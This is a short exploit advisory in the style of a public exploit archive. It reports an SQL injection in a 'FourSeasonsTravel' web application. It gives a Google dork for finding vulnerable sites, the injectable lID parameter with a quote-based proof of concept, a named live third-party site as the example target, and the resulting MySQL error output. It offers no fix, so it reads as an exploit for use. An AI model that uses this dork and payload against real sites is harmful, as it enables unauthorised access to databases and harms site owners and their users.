#################################################################################################
# Exploit Title : FourSeasonsTravel SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
# Date : 27/05/2018
# Vendor Homepages : fourseasons.com / fourseasonstravel.com / fourseasonstravelinc.com / fourseasonstravel.eu
# Tested On : Windows
# Exploit Risk : Low
# CWE : CWE-89
#################################################################################################
#Google Dork : intext:''© 2018 Four Seasons Travel - All rights reserved''
#Exploit : /index.php?lID=[SQL Injection ]
#Example Site => tirol-taxi.at/index.php?lID=1%27[ Proof of Concept for SQL Injection ] => archive.is/HZWJx
# Error in query : 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'AS sub, template, content_1' AS text FROM pages WHERE id='3' ORDER BY rang asc' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
#################################################################################################